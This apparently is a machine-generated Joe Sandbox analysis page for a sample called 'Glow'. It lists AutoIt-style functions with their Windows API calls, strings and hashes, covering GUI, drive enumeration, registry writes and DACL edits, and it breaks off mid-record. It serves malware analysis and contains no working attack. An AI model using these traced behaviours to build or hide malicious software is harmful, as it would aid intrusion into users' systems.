Part of subcall function 00417E22: SetBkColor.GDI32(?,?), ref: 00417EC5
Part of subcall function 00417E22: SelectObject.GDI32(?,?), ref: 00417ED2
Part of subcall function 00417E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00417EF1
Part of subcall function 00417E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00417F08
Part of subcall function 00417E22: GetWindowLongW.USER32(?,000000F0), ref: 00417F15

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: b7b9ebef80335c16b0d78db60ea5c20495fecc41b4ef9e0e482423de7cfe487a
Instruction ID: d030567d5810c37a242cfdc0c0c7712296c4ac2315d30c33533fc2ae9a2cb62d
Opcode Fuzzy Hash: b7b9ebef80335c16b0d78db60ea5c20495fecc41b4ef9e0e482423de7cfe487a
Instruction Fuzzy Hash: 89A1A2B1408301BFC7119F64DC48EABBBBAFF48324F104A29F962961E0D779D985CB95

Function 0040316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0040319B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004032C7
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00403306
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00403316
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 0040335D
GetClientRect.USER32(00000000,?), ref: 00403369
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 004033B2
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004033C1
GetStockObject.GDI32(00000011), ref: 004033D1
SelectObject.GDI32(00000000,00000000), ref: 004033D5
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 004033E5
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004033EE
DeleteDC.GDI32(00000000), ref: 004033F7
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00403423
SendMessageW.USER32(00000030,00000000,00000001), ref: 0040343A
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 0040347A
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0040348E
SendMessageW.USER32(00000404,00000001,00000000), ref: 0040349F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 004034D4
GetStockObject.GDI32(00000011), ref: 004034DF
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004034EA
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 004034F4

Strings

AutoIt v3, xrefs: 00403355
DISPLAY, xrefs: 004033B7
static, xrefs: 004033AC, 004034CE
msctls_progress32, xrefs: 00403470

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 3a5690a019f76e8b9c2247612bb14e9459ee0626d9d9569a6404540777a1eed1
Instruction ID: 5fe58c02f5f894c568d9ae2ba454c767451c5f197d8088186a1bdbe9b46201bb
Opcode Fuzzy Hash: 3a5690a019f76e8b9c2247612bb14e9459ee0626d9d9569a6404540777a1eed1
Instruction Fuzzy Hash: F7B15EB1A00215BFEB14DFA8CD45FAE7BA9EB09711F008165F915AB2D1C774ED40CB58

Function 003F5524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 003F5532
GetDriveTypeW.KERNEL32(?,0041DC30,?,\\.\,0041DCD0), ref: 003F560F
SetErrorMode.KERNEL32(00000000,0041DC30,?,\\.\,0041DCD0), ref: 003F577B

Strings

SATA, xrefs: 003F5715
CDROM, xrefs: 003F5640
Removable, xrefs: 003F5655, 003F565A
iSCSI, xrefs: 003F5707
Fibre, xrefs: 003F56F2
SCSI, xrefs: 003F56CF
Network, xrefs: 003F5647
MMC, xrefs: 003F5723
Fixed, xrefs: 003F564E
Unknown, xrefs: 003F5632, 003F56C8
SSD, xrefs: 003F568F
SAS, xrefs: 003F570E
Virtual, xrefs: 003F572A
RAMDisk, xrefs: 003F5639
PhysicalDrive, xrefs: 003F55BB
1394, xrefs: 003F56E4
ATA, xrefs: 003F56DD
RAID, xrefs: 003F5700
USB, xrefs: 003F56F9
FileBackedVirtual, xrefs: 003F5731
\\.\, xrefs: 003F5584
ATAPI, xrefs: 003F56D6
SSA, xrefs: 003F56EB

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 8b837652b83ade8c5abe1f15142691b568f77a2f9b52b61d71b6b028ad37a853
Instruction ID: b58a12687665c9ea607e50b1b35471f2fdd9355ee62e39774be37137214f60b5
Opcode Fuzzy Hash: 8b837652b83ade8c5abe1f15142691b568f77a2f9b52b61d71b6b028ad37a853
Instruction Fuzzy Hash: DB610570A04A0DDFD726EF24C991979B3A5EF14350B348066E706EF691C735DD06CB85

Function 00382521 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003825F8
GetSystemMetrics.USER32(00000007), ref: 00382600
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0038262B
GetSystemMetrics.USER32(00000008), ref: 00382633
GetSystemMetrics.USER32(00000004), ref: 00382658
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00382675
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00382685
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 003826B8
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 003826CC
GetClientRect.USER32(00000000,000000FF), ref: 003826EA
GetStockObject.GDI32(00000011), ref: 00382706
SendMessageW.USER32(00000000,00000030,00000000), ref: 00382711

Part of subcall function 003819CD: GetCursorPos.USER32(?), ref: 003819E1
Part of subcall function 003819CD: ScreenToClient.USER32(00000000,?), ref: 003819FE
Part of subcall function 003819CD: GetAsyncKeyState.USER32(00000001), ref: 00381A23
Part of subcall function 003819CD: GetAsyncKeyState.USER32(00000002), ref: 00381A3D

SetTimer.USER32(00000000,00000000,00000028,0038199C), ref: 00382738

Strings

<)E, xrefs: 003C39A6
(E, xrefs: 00382749
AutoIt v3 GUI, xrefs: 003826B0
<)E, xrefs: 0038255C
(E, xrefs: 003C3909
(E, xrefs: 0038271A

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: <)E$<)E$AutoIt v3 GUI$(E$(E$(E
API String ID: 1458621304-2898306966
Opcode ID: 5eecf5283ab24fc11a6cce70a1fcfffc65799904c8b9f8ff676fd4d9829245b2
Instruction ID: 67777f1b640df81f09a799b96252eb695632b544f848be3d28837f419510f3e9
Opcode Fuzzy Hash: 5eecf5283ab24fc11a6cce70a1fcfffc65799904c8b9f8ff676fd4d9829245b2
Instruction Fuzzy Hash: 58B17BB1A00209AFCB15DFA8CD45BEE7BB5FB48314F11822AFA15EB290D774D940CB54

Function 00411A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00411BC4
GetDesktopWindow.USER32 ref: 00411BD9
GetWindowRect.USER32(00000000), ref: 00411BE0
GetWindowLongW.USER32(?,000000F0), ref: 00411C35
DestroyWindow.USER32(?), ref: 00411C55
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00411C89
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00411CA7
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00411CB9
SendMessageW.USER32(00000000,00000421,?,?), ref: 00411CCE
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00411CE1
IsWindowVisible.USER32(00000000), ref: 00411D3D
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00411D58
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00411D6C
GetWindowRect.USER32(00000000,?), ref: 00411D84
MonitorFromPoint.USER32(?,?,00000002), ref: 00411DAA
GetMonitorInfoW.USER32(00000000,?), ref: 00411DC4
CopyRect.USER32(?,?), ref: 00411DDB
SendMessageW.USER32(00000000,00000412,00000000), ref: 00411E46

Strings

(, xrefs: 00411DB7
tooltips_class32, xrefs: 00411C82
0, xrefs: 00411B6F

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 440a1b6f5bf367a57969ae48378525e63f96260f0c13d74f4c61ef7ddbcff74e
Instruction ID: ca52f396b22e4b439d136764a7d17e11782275d83bd2b254367da365b8980444
Opcode Fuzzy Hash: 440a1b6f5bf367a57969ae48378525e63f96260f0c13d74f4c61ef7ddbcff74e
Instruction Fuzzy Hash: C5B19B71604301AFD714DF64C984BABBBE5FF84310F00891DFA999B2A1D735E885CBA6

Function 00410CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00410D81
_wcslen.LIBCMT ref: 00410DBB
_wcslen.LIBCMT ref: 00410E25
_wcslen.LIBCMT ref: 00410E8D
_wcslen.LIBCMT ref: 00410F11
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00410F61
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00410FA0

Part of subcall function 0039FD52: _wcslen.LIBCMT ref: 0039FD5D

Part of subcall function 003E2B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003E2BA5
Part of subcall function 003E2B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003E2BD7

Strings

ISSELECTED, xrefs: 00410F79
SELECTALL, xrefs: 00410FB1
GETITEMCOUNT, xrefs: 00410DB2, 00410DD3
SELECTCLEAR, xrefs: 00410FC9
GETTEXT, xrefs: 00410E88, 00410EA3
SELECTINVERT, xrefs: 0041101A
FINDITEM, xrefs: 004110C3
GETSELECTED, xrefs: 0041107D
GETSELECTEDCOUNT, xrefs: 00410F0C, 00410F27
SELECT, xrefs: 00410FE4
DESELECT, xrefs: 00411038
GETSUBITEMCOUNT, xrefs: 00410E20, 00410E3B
VIEWCHANGE, xrefs: 00411111

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 69a80ef4079a639d5d7893019e8319a1155368b23405317b65e29a6610ee262b
Instruction ID: 0533e0a1aeeb5ffcfd1e3bdef9868bd28fa4a952126a22d6224fea824711aef8
Opcode Fuzzy Hash: 69a80ef4079a639d5d7893019e8319a1155368b23405317b65e29a6610ee262b
Instruction Fuzzy Hash: 38E1F1312043418FC714EF24C9418ABB3E6FF88314B10896EF4969B7A1DB78ED86CB56

Function 003E16D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 003E1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 003E1A60
Part of subcall function 003E1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,003E14E7,?,?,?), ref: 003E1A6C
Part of subcall function 003E1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,003E14E7,?,?,?), ref: 003E1A7B
Part of subcall function 003E1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,003E14E7,?,?,?), ref: 003E1A82
Part of subcall function 003E1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 003E1A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 003E1741
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 003E1775
GetLengthSid.ADVAPI32(?), ref: 003E178C
GetAce.ADVAPI32(?,00000000,?), ref: 003E17C6
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003E17E2
GetLengthSid.ADVAPI32(?), ref: 003E17F9
GetProcessHeap.KERNEL32(00000008,00000008), ref: 003E1801
HeapAlloc.KERNEL32(00000000), ref: 003E1808
GetLengthSid.ADVAPI32(?,00000008,?), ref: 003E1829
CopySid.ADVAPI32(00000000), ref: 003E1830
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 003E185F
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003E1881
SetUserObjectSecurity.USER32(?,00000004,?), ref: 003E1893
GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E18BA
HeapFree.KERNEL32(00000000), ref: 003E18C1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E18CA
HeapFree.KERNEL32(00000000), ref: 003E18D1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E18DA
HeapFree.KERNEL32(00000000), ref: 003E18E1
GetProcessHeap.KERNEL32(00000000,?), ref: 003E18ED
HeapFree.KERNEL32(00000000), ref: 003E18F4

Part of subcall function 003E1ADF: GetProcessHeap.KERNEL32(00000008,003E14FD,?,00000000,?,003E14FD,?), ref: 003E1AED
Part of subcall function 003E1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,003E14FD,?), ref: 003E1AF4
Part of subcall function 003E1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,003E14FD,?), ref: 003E1B03

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 746a896caf3a46161b86d2a5675048938a02be27c2b033d3553f957a50a4db91
Instruction ID: 3c2ea43603f423069a961a518436c949ce3b96ef4024d320931693bea99bc51f
Opcode Fuzzy Hash: 746a896caf3a46161b86d2a5675048938a02be27c2b033d3553f957a50a4db91
Instruction Fuzzy Hash: 09715AB2D00269AFDF11DFA6DC44FEEBBB8BF08740F158225F915A6190D7309A05CB60

Function 0040CE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0040CF1D
RegCreateKeyExW.ADVAPI32(?,?,00000000,0041DCD0,00000000,?,00000000,?,?), ref: 0040CFA4
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0040D004
_wcslen.LIBCMT ref: 0040D054
_wcslen.LIBCMT ref: 0040D0CF
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0040D112
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0040D221
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0040D2AD
RegCloseKey.ADVAPI32(?), ref: 0040D2E1
RegCloseKey.ADVAPI32(00000000), ref: 0040D2EE
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0040D3C0

Strings

REG_QWORD, xrefs: 0040D323
REG_DWORD, xrefs: 0040D264
REG_MULTI_SZ, xrefs: 0040D155
REG_BINARY, xrefs: 0040D373
REG_EXPAND_SZ, xrefs: 0040D02D
REG_SZ, xrefs: 0040D0A4

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 5bdb548d324bb1e4f5b5b6a38e1ac7e1788e169cc445e7d7ae6be2f2cc562473
Instruction ID: 85e432b2b0b85c4160b56000d98259cfc6e9211d76111be4a6c811005c75992c
Opcode Fuzzy Hash: 5bdb548d324bb1e4f5b5b6a38e1ac7e1788e169cc445e7d7ae6be2f2cc562473
Instruction Fuzzy Hash: 661258356043019FD715EF14C881A2AB7E6EF88714F1488ADF94AAB3A2CB35FD45CB85

Function 004113BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00411462
_wcslen.LIBCMT ref: 0041149D
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004114F0
_wcslen.LIBCMT ref: 00411526
_wcslen.LIBCMT ref: 004115A2
_wcslen.LIBCMT ref: 0041161D

Part of subcall function 0039FD52: _wcslen.LIBCMT ref: 0039FD5D

Part of subcall function 003E3535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003E3547

Strings

EXISTS, xrefs: 00411618, 00411633
EXPAND, xrefs: 00411694
GETSELECTED, xrefs: 004116EA
GETITEMCOUNT, xrefs: 004116BA
UNCHECK, xrefs: 004117DA
SELECT, xrefs: 004117AD
CHECK, xrefs: 00411521, 0041153C
GETTEXT, xrefs: 00411733
ISCHECKED, xrefs: 0041177D
GETTOTALCOUNT, xrefs: 0041148E, 004114B3
COLLAPSE, xrefs: 0041159D, 004115B8

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 9537656b864f5b35d4386d1c2b68f735b0e0df9fd0095e865e234afab6f9128a
Instruction ID: d7973391ab73e227611d8ae6a91df1a5f9b318b5a7326c030f1d0542243ff75b
Opcode Fuzzy Hash: 9537656b864f5b35d4386d1c2b68f735b0e0df9fd0095e865e234afab6f9128a
Instruction Fuzzy Hash: CFE1C2316043419FCB01EF24C4509AAB7E2FF94314F14895EF9969B3A2DB35ED85CB85

Function 0040D3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0040C10E,?,?), ref: 0040D415
_wcslen.LIBCMT ref: 0040D451
_wcslen.LIBCMT ref: 0040D4C8
_wcslen.LIBCMT ref: 0040D4FE
_wcslen.LIBCMT ref: 0040D559
_wcslen.LIBCMT ref: 0040D58F
_wcslen.LIBCMT ref: 0040D5DF

Strings

HKEY_CLASSES_ROOT, xrefs: 0040D553, 0040D558
HKCR, xrefs: 0040D589, 0040D58E
HKEY_CURRENT_CONFIG, xrefs: 0040D5D9, 0040D5DE
HKEY_CURRENT_USER, xrefs: 0040D61D
HKU, xrefs: 0040D650
HKCU, xrefs: 0040D62E
HKEY_USERS, xrefs: 0040D63F
HKCC, xrefs: 0040D60C
HKEY_LOCAL_MACHINE, xrefs: 0040D4C2, 0040D4C7
HKLM, xrefs: 0040D4F8, 0040D4FD

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 90617ef7c12fd8903eb9900ce7d1e6e57220a407608acf52c30de6169aef916e
Instruction ID: c80aaf5a1891fbc93b62fb4defcf5bccb5f3f90f66664f1edf51db0c6b3bb8c9
Opcode Fuzzy Hash: 90617ef7c12fd8903eb9900ce7d1e6e57220a407608acf52c30de6169aef916e
Instruction Fuzzy Hash: 8471C432E001269BCB109EB8CD505BF33A1AF61764B21053AEC56BB3D4EA3DDD4D8398

Function 00418D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00418DB5
_wcslen.LIBCMT ref: 00418DC9
_wcslen.LIBCMT ref: 00418DEC
_wcslen.LIBCMT ref: 00418E0F
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00418E4D
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00416691), ref: 00418EA9
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00418EE2
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00418F25
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00418F5C
FreeLibrary.KERNEL32(?), ref: 00418F68
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00418F78
DestroyIcon.USER32(?,?,?,?,?,00416691), ref: 00418F87
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00418FA4
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00418FB0

Strings

.icl, xrefs: 00418DC3
.dll, xrefs: 00418E06
.exe, xrefs: 00418DE3

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

